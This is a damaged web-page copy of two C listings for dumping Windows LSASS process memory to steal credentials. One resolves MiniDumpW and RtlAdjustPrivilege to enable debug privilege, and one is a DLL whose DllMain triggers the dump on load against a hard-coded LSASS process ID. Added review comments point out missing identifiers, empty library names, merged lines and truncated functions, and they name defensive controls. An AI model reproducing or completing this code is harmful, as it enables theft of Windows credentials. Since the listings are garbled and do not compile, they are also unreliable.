2023年12月24日发(作者:软件测试工程师的职业规划)
// NOTE(review): this listing was damaged during extraction. Several
// identifiers and string literals are missing (for example the left-hand
// side of "= sizeof(pe32)", the arguments to _stricmp, and the library name
// passed to LoadLibrary), and Dump_Lsass is cut off. It does not compile as
// shown; the gaps are left exactly as they appear on the page.
//
// Defender context: the code belongs to the OS credential dumping / LSASS
// memory class of techniques. Relevant controls are LSA protection (RunAsPPL),
// Credential Guard, and monitoring of process-access events that target the
// LSASS process (e.g. Sysmon Event ID 10).

// Function-pointer type used below for the export resolved by the name
// "MiniDumpW" via GetProcAddress.
typedef HRESULT(WINAPI* _MiniDumpW)( DWORD arg1, DWORD arg2, PWCHAR cmdline);

// Walks a Toolhelp process snapshot and returns a process ID when the
// case-insensitive name comparison matches, or -1 when no entry matches.
// NOTE(review): presumably compares the snapshot entry's executable name
// against a fixed process name; both operands were lost in extraction.
int GetPid(){
    PROCESSENTRY32 pe32;
    // Left-hand side missing in the extracted text.
    = sizeof(pe32);
    HANDLE hProcessSnap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
    if (hProcessSnap == INVALID_HANDLE_VALUE) {
        printf("CreateToolhelp32Snapshot Error!");
        // NOTE(review): the function returns int, so this yields 0, while the
        // "not found" path below returns -1; callers see two different
        // failure values.
        return false;
    }
    BOOL bResult = Process32First(hProcessSnap, &pe32);
    while (bResult) {
        if (_stricmp(ile, "") == 0) {
            // NOTE(review): this early return skips CloseHandle, so the
            // snapshot handle is not released on the match path.
            return 32ProcessID;
        }
        bResult = Process32Next(hProcessSnap, &pe32);
    }
    CloseHandle(hProcessSnap);
    return -1;
}

// Resolves the "MiniDumpW" and "RtlAdjustPrivilege" exports at run time.
// The rest of the function is not present on the page.
// NOTE(review): _RtlAdjustPrivilege is not declared anywhere in this
// listing; a typedef with that name appears only in the second listing.
int Dump_Lsass() {
    HRESULT hr;
    _MiniDumpW MiniDumpW;
    _RtlAdjustPrivilege RtlAdjustPrivilege;
    ULONG t;
    // Library name is an empty string in the extracted text.
    MiniDumpW = (_MiniDumpW)GetProcAddress( LoadLibrary(""), "MiniDumpW");
    RtlAdjustPrivilege = (_RtlAdjustPrivilege)GetProcAddress( GetModuleHandle("ntdll"), "RtlAdjustPrivilege");
    if (MiniDumpW == NULL || RtlAdjustPrivilege == NULL) {
// NOTE(review): second listing on the page, also damaged by extraction. The
// library names are empty strings, the statements that followed the original
// "//" comment were merged onto the comment line, and DllMain is cut off
// before its closing braces. The text is kept as it appears on the page.
//
// Defender context: this is a DLL whose DllMain calls dump() on
// DLL_PROCESS_ATTACH, so the call is reached from the attach notification
// rather than from a named export. The relevant telemetry is unexpected DLL
// loads, processes enabling the debug privilege, and process-access events
// that target LSASS; LSA protection (RunAsPPL) and Credential Guard are the
// matching hardening controls.
#pragma comment(lib,"")

// Function-pointer type for the export resolved by the name "MiniDumpW".
typedef HRESULT(WINAPI* _MiniDumpW)( DWORD arg1, DWORD arg2, PWCHAR cmdline);

// Function-pointer type for ntdll's "RtlAdjustPrivilege", resolved by name
// in dump() below.
typedef NTSTATUS(WINAPI* _RtlAdjustPrivilege)( ULONG Privilege, BOOL Enable, BOOL CurrentThread, PULONG Enabled);

// Resolves the two exports at run time and calls MiniDumpW with a wide
// string argument. Returns 0 on every path shown.
int dump() {
    HRESULT hr;
    _MiniDumpW MiniDumpW;
    _RtlAdjustPrivilege RtlAdjustPrivilege;
    ULONG t;
    // Library name is an empty string in the extracted text.
    MiniDumpW = (_MiniDumpW)GetProcAddress( LoadLibrary(L""), "MiniDumpW");
    RtlAdjustPrivilege = (_RtlAdjustPrivilege)GetProcAddress( GetModuleHandle(L"ntdll"), "RtlAdjustPrivilege");
    if (MiniDumpW == NULL) {
        return 0;
    }
    // NOTE(review): as extracted, everything from "try enable debug
    // privilege" to the end of the next line is a single comment, so ws is
    // never declared before the MiniDumpW call. The privilege value 20 is
    // presumably SeDebugPrivilege, going by the author's own comment. The
    // process ID is hard-coded and the argument string is incomplete.
    // try enable debug privilege RtlAdjustPrivilege(20, TRUE, FALSE, &t); wchar_t ws[100]; swprintf(ws, 100, L"%hs", "784 c: full"); // 784 is the PID of the lsass process "
    MiniDumpW(0, 0, ws);
    return 0;
}

// DLL entry point: calls dump() on DLL_PROCESS_ATTACH and does nothing for
// the other notification reasons. The listing ends before the switch and
// the function are closed.
BOOL APIENTRY DllMain(HMODULE hModule, DWORD ul_reason_for_call, LPVOID lpReserved) {
    switch (ul_reason_for_call) {
    case DLL_PROCESS_ATTACH:
        dump();
        break;
    case DLL_THREAD_ATTACH:
    case DLL_THREAD_DETACH:
    case DLL_PROCESS_DETACH:
        break;